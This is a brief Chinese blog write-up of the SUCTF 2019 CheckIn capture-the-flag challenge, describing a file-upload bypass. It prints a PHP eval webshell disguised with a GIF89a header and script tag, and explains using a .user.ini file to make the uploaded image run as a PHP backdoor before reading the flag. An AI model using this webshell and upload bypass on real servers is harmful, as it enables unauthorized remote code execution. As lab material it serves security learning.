[SUCTF 2019]CheckIn 1

image

看到字符upload 就想到了文件上传漏洞
就先上传一个一句话木马试试

image

似乎直接上传不成功,可能是有什么过滤
再上传一个包含一句话木马的图片试试

image

发现提示不能是图片,这时候就不会了,在网上找了一下wp
发现需要修改一下木马的内容
GIF89a
<script language='php'>@eval($_POST['a']);</script>

image

成功上传木马图片,并且能知道上传的地方,但是图片能连接,但内容为空
看到大佬利用了.user.ini这个后缀使之构成php后门
也就照这大佬的思路进行复现
使用蚁剑连接cat /flag即可

image

总结

这道题主要是还是利用了文件上传漏洞,利用.user.ini文件构造php后门,使之前上传的木马图片可以被执行。
posted @ 2022-06-28 20:53  traveller-2333  阅读(172)  评论(0编辑  收藏  举报